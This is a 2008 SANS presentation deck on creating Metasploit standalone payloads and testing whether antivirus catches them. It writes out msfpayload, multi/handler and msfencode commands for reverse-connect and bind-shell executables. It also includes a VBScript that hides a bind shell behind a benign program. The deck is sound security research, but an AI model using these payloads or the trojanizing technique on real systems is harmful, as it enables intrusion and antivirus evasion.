USE

saucecopywriterInternet και Εφαρμογές Web

2 Φεβ 2013 (πριν από 4 χρόνια και 2 μήνες)

214 εμφανίσεις

1

SANS Technology Institute
-

Candidate for Master of Science Degree

1

Metasploit Payloads and
Antivirus

Mark Baggett

December 2008

GIAC GSEC GCIH

SANS Technology Institute
-

Candidate for Master of Science Degree

2

Objectives


Learn how an attacker might use
Metasploit standalone payloads
against you


See how these payloads are
created, used and “trojanized”


Understand what level of protection
to expect from your antivirus

SANS Technology Institute
-

Candidate for Master of Science Degree

3

How are they used against you?


Can be executed by tricking a user into
running the payload or via an exploit that is
not in the framework


Execute a payload on a fully patched system


Use Meterpreter’s advanced functionality such
as anti
-
forensics, detection evasion, and
pivoting


Scenario:


Attacker bruteforces password to a fully patched
machine


Runs Meterpreter payload and uses it to pivot


Uses framework to attack other hosts on DMZ

SANS Technology Institute
-

Candidate for Master of Science Degree

4

msfpayload


Generates payloads in various formats


Source code in C, Perl, Ruby, Java


Hexadecimal (RAW)


Binary executable formats for Win32;
Linux; OS X on Intel, PPC, iPhone


Java automatically selects Big Endian or
Little Endian depending upon processor of
targeted payload


You can override this with a simple
modification to msfpayload (js_be, js_le)

SANS Technology Institute
-

Candidate for Master of Science Degree

5

Demonstration


See how these payloads are created

SANS Technology Institute
-

Candidate for Master of Science Degree

6

Interacting with payloads


Some payloads will not work standalone


find_port, find_tag


Bind shell payloads can be used outside
of the framework


Others require the use of the
multi/handler exploit

SANS Technology Institute
-

Candidate for Master of Science Degree

7

Using multi/handler

./msfcli exploit/multi/handler
\

PAYLOAD=windows/vncinject/reverse_tcp
\

RHOST=192.168.100.3
\

DisableCourtesyShell=TRUE E

./msfpayload
\




windows/vncinjection/reverse_tcp
\

LHOST=192.168.100.5 X > vncrev.exe

CREATION
-

LHOST is the attacker’s IP

USE
-

RHOST is the victim’s IP

SANS Technology Institute
-

Candidate for Master of Science Degree

8

Demonstration


See how these payloads are used

SANS Technology Institute
-

Candidate for Master of Science Degree

9

msfencode


Will encode a payload using one of
various algorithms


Expects RAW msfpayload as input


-
h for help


-
l list of available encoders


-
e encoder to use


-
t output type


-
b characters to avoid

SANS Technology Institute
-

Candidate for Master of Science Degree

10

msfencode
-
> Binary


Binary was not a selectable output type
from msfencode until Sept 29
th

2008


3 ways to create a binary


Add 3 lines of code to msfencode


Generate RAW output and use a hex editor
to place it in a binary PE format


Generate C source code and compile it


-
t exe option will encode a Windows
binary

SANS Technology Institute
-

Candidate for Master of Science Degree

11

msfencode (continued)


./msfpayload windows/shell_bind_tcp R |
\

./msfencode
-
e x86/shikata_ga_nia
-
t exe


./msfpayload windows/shell_bind_tcp R |
\

./msfencode
-
e x86/shikata_ga_nia

b
\


\
x41
\
x42
\
x43”
-
t exe


Text.to_win32pe() uses /data/templates


Use your own binaries with “PAYLOAD:” tag


To_win32pe chooses a random base relocation
address (4 bytes at position 0x88)


Roll your own with template.c

SANS Technology Institute
-

Candidate for Master of Science Degree

12

Turning payloads into trojans


IExpress is a setup utility that comes
with Windows XP


Can create packages that visibly execute
a benign host program and invisibly
execute a malicious payload


All you need is a small VBscript to
execute your payload invisibly


Trojan payloads only temporarily avoid
antivirus

SANS Technology Institute
-

Candidate for Master of Science Degree

13

Payload script


The script

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run "mspaint.exe",1, False

Wshshell.Run "bindshell.exe",0, False



Quick IExpress Demonstration


See how these payloads are “trojanized”


SANS Technology Institute
-

Candidate for Master of Science Degree

14

Level of protection to expect
from your antivirus


Expected results: Low rate of detection for unencoded
payloads and no detection for encoded payloads


Actual results: No detection for unencoded payloads or
encoded payloads


2 products’ heuristics flagged payloads


Pauldotcom Episode 125 at the end of September
2008 found 6 systems detected the payload


My HIPS testing yielded disappointing results


HD Moore has stated that version 3.2 will generate a
new Windows Binary that is harder to detect.

SANS Technology Institute
-

Candidate for Master of Science Degree

15

Summary


Metasploit is a powerful framework with a diverse set
of tools


Using these tools attackers can easily create
standalone payloads that run on fully patched
systems


Antivirus products do not at this time provide
adequate protection against Metasploit payloads


My paper is in the SANS reading room titled
“Effectiveness of Antivirus Detecting Metasploit
Payloads”